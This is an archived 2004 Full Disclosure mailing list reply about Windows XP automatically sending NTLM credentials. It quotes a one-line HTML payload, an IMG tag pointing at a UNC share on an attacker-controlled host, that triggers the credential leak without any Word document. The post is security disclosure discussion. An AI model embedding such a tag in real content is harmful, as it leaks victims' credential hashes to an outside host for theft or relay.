Full Disclosure mailing list archives

Re: Automatically passing NTLM authentication credentials on Windows XP

From: 3APA3A <3APA3A () SECURITY NNOV RU>
Date: Tue, 28 Sep 2004 17:17:51 +0400

Dear Hidenobu Seki,

This  problem  is  known  since at least 1997 and still can be exploited
with   <IMG  SRC="\\w.x.y.z\fakeshare\fakefile">  without  any  MS  Word
document.

--Tuesday, September 28, 2004, 2:20:13 AM, you wrote to full-disclosure () lists netsys com:

HS> Hello.

HS> For your information:
HS> Automatically passing NTLM authentication credentials on Windows XP
HS> http://www.securityfriday.com/Topics/winxp3.html

HS> Thank you.

HS> _________________________________________________________________
HS> Add photos to your messages with MSN 8. Get 2 months FREE*. 
HS> http://join.msn.com/?page=features/featuredemail

HS> _______________________________________________
HS> Full-Disclosure - We believe in it.
HS> Charter: http://lists.netsys.com/full-disclosure-charter.html


-- 
~/ZARAZA
Особую проблему составляет алкоголизм.  (Лем)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Current thread:

Automatically passing NTLM authentication credentials on Windows XP Hidenobu Seki (Sep 27)
- Re: Automatically passing NTLM authentication credentials on Windows XP 3APA3A (Sep 28)
  - Re: Automatically passing NTLM authentication credentials on Windows XP Barrie Dempster (Sep 28)
- <Possible follow-ups>
- Re: Automatically passing NTLM authentication credentials on Windows XP Hidenobu Seki (Sep 28)
  - Re[2]: Automatically passing NTLM authentication credentials on Windows XP 3APA3A (Sep 29)
- Re[2]: Automatically passing NTLM authentication credentials on Windows XP Hidenobu Seki (Sep 29)